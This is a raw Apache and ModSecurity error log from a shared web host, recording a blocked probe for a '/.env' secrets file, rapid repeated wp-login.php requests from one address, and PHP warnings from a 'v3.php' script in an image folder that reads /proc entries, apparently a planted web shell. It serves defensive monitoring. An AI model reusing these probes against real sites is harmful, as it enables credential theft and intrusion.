[Tue May 12 06:57:40.862433 2026] [security2:error] [pid 1842385:tid 1842392] [client 85.121.126.213:49286] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env"] [unique_id "agKzRBs7kySIUZ3ORnJAGgAAAQI"]
[Tue May 12 06:57:40.862605 2026] [security2:error] [pid 1842385:tid 1842392] [client 85.121.126.213:49286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env"] [unique_id "agKzRBs7kySIUZ3ORnJAGgAAAQI"]
[Tue May 12 06:57:40.862834 2026] [security2:error] [pid 1842385:tid 1842392] [client 85.121.126.213:49286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env"] [unique_id "agKzRBs7kySIUZ3ORnJAGgAAAQI"]
PHP Warning:  filesize(): stat failed for /proc/241/task/241/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/task/241/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/241/task/241/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/task/241/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/241/task/241/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/task/241/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:59:11.572065 2026] [ssl:error] [pid 1842385:tid 1842393] [client 98.88.137.2:63222] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname cpcontacts.crm.tct-telecom.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 06:59:36.751345 2026] [authz_core:error] [pid 1844863:tid 1844872] [client 47.128.126.103:13914] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/search/error_log
[Tue May 12 06:59:49.463706 2026] [security2:error] [pid 1825287:tid 1825327] [client 43.160.225.169:55848] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKzxQgpmE1yW0glLdhI1QAAANU"]
[Tue May 12 06:59:52.401839 2026] [security2:error] [pid 1844863:tid 1844890] [client 43.160.225.169:33840] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKzyPaAnTZtx1_H_wzSdgAAAVU"], referer: http://pole-de-mobilite-regional.com
[Tue May 12 07:00:04.848717 2026] [authz_core:error] [pid 1825179:tid 1825216] [client 20.56.20.8:53017] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/error_log, referer: binance.com
[Tue May 12 07:00:07.140285 2026] [security2:error] [pid 1820198:tid 1820222] [client 43.157.158.178:49864] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/mixeur/feed/"] [unique_id "agKz181tk6y7yBJLpJpQ5wAAAJY"]
[Tue May 12 07:00:14.889069 2026] [authz_core:error] [pid 1820198:tid 1820208] [client 20.56.20.8:53707] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/error_log, referer: binance.com
[Tue May 12 07:00:16.930670 2026] [security2:error] [pid 1825179:tid 1825200] [client 43.134.92.251:33692] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/typha/"] [unique_id "agKz4Nr1yOh9Tvizezi58QAAAEI"]
[Tue May 12 07:00:31.749406 2026] [security2:error] [pid 1820198:tid 1820214] [client 43.157.95.131:41074] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKz781tk6y7yBJLpJpRLAAAAI4"]
[Tue May 12 07:00:33.567185 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php
[Tue May 12 07:00:33.653190 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php
[Tue May 12 07:00:33.696166 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php
[Tue May 12 07:00:33.739070 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-signup.php
[Tue May 12 07:00:33.781681 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-activate.php
[Tue May 12 07:00:33.954288 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-comments-post.php
[Tue May 12 07:00:33.997966 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php
[Tue May 12 07:00:34.126418 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.212434 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.298608 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.390008 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.486808 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.574394 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.662137 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.748878 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.835005 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:34.923331 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.012319 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.130016 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.216703 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.315976 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.404965 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.492332 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.578863 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.666075 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.755248 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.845616 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:35.933549 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.024706 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.129934 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.216387 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.323385 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.409335 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.500420 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.590465 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.676540 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.772908 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.858452 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:36.946259 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.033607 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.120194 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.206885 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.293831 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.380826 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.468158 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.565047 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.653860 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.740462 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.828935 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:37.915537 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.002488 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.091871 2026] [:error] [pid 1820198:tid 1820211] [client 91.224.92.99:55360] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.293729 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.384985 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.476628 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.567999 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.661326 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.752904 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.852527 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:38.944509 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.053355 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.143775 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.247000 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.340670 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.433034 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.525761 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.616165 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.707807 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.799806 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.891385 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:39.999835 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.092550 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.185586 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.277033 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.368101 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.459432 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.562293 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.661983 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.752790 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.844182 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.937919 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:40.988956 2026] [security2:error] [pid 1820198:tid 1820206] [client 43.165.198.224:43112] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/lassociation-fetons-les-bauges-tattend-a-lescheraines/"] [unique_id "agKz-M1tk6y7yBJLpJpR4AAAAIY"]
[Tue May 12 07:00:41.028954 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.121318 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.211874 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.302034 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.392154 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.484128 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.574320 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.673578 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.767110 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.857400 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:41.947421 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.038484 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.129882 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.222133 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.314457 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.415211 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.504427 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.593828 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.684124 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.784966 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:42.887761 2026] [:error] [pid 1820198:tid 1820222] [client 91.224.92.99:50740] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:43.078796 2026] [:error] [pid 1844863:tid 1844892] [client 91.224.92.99:59636] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
